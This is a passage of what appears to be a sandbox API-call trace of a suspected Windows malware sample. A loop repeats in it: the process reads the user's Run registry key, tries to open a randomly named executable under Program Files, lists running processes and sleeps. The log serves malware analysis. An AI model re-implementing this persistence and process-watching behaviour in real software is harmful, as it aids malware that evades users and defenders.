SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.782] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.782] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.782] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.782] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.786] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.797] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.797] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.797] NtClose (Handle=0x14c) returned 0x0 [0175.797] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.797] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.797] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.798] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.798] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.798] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.802] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.813] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.813] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.813] NtClose (Handle=0x14c) returned 0x0 [0175.813] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.813] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.813] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.813] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.813] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.813] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.818] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.832] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.832] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.832] NtClose (Handle=0x14c) returned 0x0 [0175.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.832] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.833] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.833] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.833] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.833] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.837] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.848] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.849] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.849] NtClose (Handle=0x14c) returned 0x0 [0175.849] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.854] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.854] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.854] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.855] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.855] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.897] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.907] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.907] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.907] NtClose (Handle=0x14c) returned 0x0 [0175.908] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.908] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.908] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.908] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.908] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.908] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.912] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.922] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.922] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.922] NtClose (Handle=0x14c) returned 0x0 [0175.922] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.922] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.923] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.923] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.923] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.923] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.935] 